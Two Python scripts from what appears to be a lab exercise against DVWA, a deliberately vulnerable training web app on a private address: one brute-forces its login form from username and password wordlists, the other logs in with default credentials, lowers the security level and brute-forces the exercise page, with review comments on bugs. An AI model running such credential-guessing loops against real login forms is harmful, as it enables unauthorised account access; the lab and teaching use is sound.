target = DVWA 서버
Bruteforce.py
import requests
from bs4 import BeautifulSoup
import re
# url : http://192.168.10.134/dvwa/login.php
# data : username=admin&password=1234&Login=Login
# proxies : http|https://127.0.0.1:9000
# FAIL_MESS : Login failed
# (1) dictionary file read + brute force attack
# (2) result
# (1) dictionary file read + brute force attack
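# Inputs for the lab exercise: one candidate per line in each wordlist, tried
# against the DVWA login form at login_url.
userfile = 'username.txt'
passfile = 'password.txt'
login_url = 'http://192.168.10.134/dvwa/login.php'
FAIL_MESS = 'Login failed'

# `with` closes both wordlists even when a request raises. The original left
# the user file open, plus one password-file handle per user.
with open(userfile) as ufile:
    for user in ufile:
        user = user.rstrip()
        with open(passfile) as pfile:
            for passwd in pfile:
                passwd = passwd.rstrip()
                login_data = {'username': user, 'password': passwd, 'Login': 'Login'}
                # One POST per (user, password) pair. On the server side this
                # is a steady run of POSTs to login.php from a single client,
                # the pattern that lockout or rate limiting on a login form is
                # meant to stop.
                resp = requests.post(login_url, data=login_data)
                soup = BeautifulSoup(resp.text, 'lxml')
                # attrs is meant to be a mapping. The original passed the set
                # {'class', 'message'} (comma instead of colon).
                content = soup.find_all('div', {'class': 'message'})
                if FAIL_MESS in str(content):
                    print('[ WARN ] %s : %s' % (user, passwd))
                else:
                    # NOTE(review): this branch runs whenever the failure text
                    # is absent, so an error page or a response without the
                    # message div is also printed as [ OK ].
                    print('[ OK ] %s : %s' % (user, passwd))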
# (2) result
bruteforce2.py
import requests
from bs4 import BeautifulSoup
import re
import sys
# 1) Login attempt
# 2) Security Level configuration
# 3) Brute Force Attack
# 1) Login attempt
# Method : POST
# url : http://192.168.10.134/dvwa/login.php
# data : username=admin&password=password&Login=Login
# ok_mess : Welcome to Damn Vulnerable Web App!
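# Step 1: log in to the DVWA lab instance with the account shown in the notes
# above. The Session keeps the resulting cookies, and the later steps reuse it.
login_url = 'http://192.168.10.134/dvwa/login.php'
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
login_ok = 'Welcome to Damn Vulnerable Web App!'
# Requests go through a local proxy on port 9000 (presumably for inspecting
# the traffic). The second key was misspelled 'htts' in the original, so it
# never applied to https URLs.
proxies = {'http': 'http://localhost:9000', 'https': 'https://localhost:9000'}
s = requests.Session()
resp = s.post(login_url, data=login_data, proxies=proxies)
soup = BeautifulSoup(resp.text, 'lxml')
# A response without an <h1> (or with an <h1> holding nested markup) yields
# None here. The original dereferenced it directly and would raise instead of
# reaching the failure branch.
heading = soup.h1.string if soup.h1 is not None else None
if heading is not None and login_ok in heading:
    print('[ OK ] Login success.')
else:
    print('[ WARN ] Login failed.')
    sys.exit(2)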
# 2) Security Level configuration
# Method : POST
# url : http://192.168.10.134/dvwa/security.php
# data : security=low&seclev_submit=Submit
# ok_mess : 'Security level set to low'
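# Step 2: set the DVWA security level to "low" for the authenticated session
# `s`, then confirm it from the confirmation message on the returned page.
security_url = 'http://192.168.10.134/dvwa/security.php'
security_data = {'security': 'low', 'seclev_submit': 'Submit'}
resp = s.post(security_url, data=security_data, proxies=proxies)
soup = BeautifulSoup(resp.text, 'lxml')
security_ok = 'Security level set to low'
# attrs is meant to be a mapping. The original passed the set
# {'class', 'message'} (comma instead of colon).
messages = soup.find_all('div', {'class': 'message'})
if security_ok in str(messages):
    print('[ OK ] Security level set to low.')
else:
    print('[ WARN ] Security level is not set.')
    sys.exit(3)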
# 3) Brute Force Attack
# file: username.txt, password.txt
# fail_mess: 'Username and/or password incorrect.'
# 3-1) dictionary file read && dictionary attack
# 3-2) result report
# 3-1) dictionary file read && dictionary attack
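# Step 3-1: walk the two wordlists and send one request per (user, password)
# pair to the DVWA brute-force exercise page, reusing the session `s`.
userfile = 'username.txt'
passfile = 'password.txt'
num = 0  # running count of attempts; only used by the commented-out debug print
# Loop-invariant, so defined once instead of on every attempt.
brute_url = 'http://192.168.10.134/dvwa/vulnerabilities/brute/?'

# `with` closes both wordlists even when a request raises. The original left
# the user file open, plus one password-file handle per user.
with open(userfile) as ufile:
    for user in ufile:
        user = user.rstrip()
        with open(passfile) as pfile:
            for passwd in pfile:
                num += 1
                passwd = passwd.rstrip()
                # print(num, user, passwd)
                # Method: GET
                # params: username=admin&password=1111&Login=Login
                # fail_mess: 'Username and/or password incorrect'
                # The form uses GET, so every candidate credential travels in
                # the query string and is visible to the proxy configured
                # above (and presumably to the server's request log).
                brute_params = {'username': user, 'password': passwd, 'Login': 'Login'}
                resp = s.get(brute_url, params=brute_params, proxies=proxies)
                soup = BeautifulSoup(resp.text, 'lxml')
                # NOTE(review): this expression's value is discarded, so the
                # loop as shown never evaluates or reports a response. Step
                # 3-2 is only a heading on this page. It also raises
                # AttributeError if the page has no <script> element.
                str(soup.script.pre)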
# 3-2) result report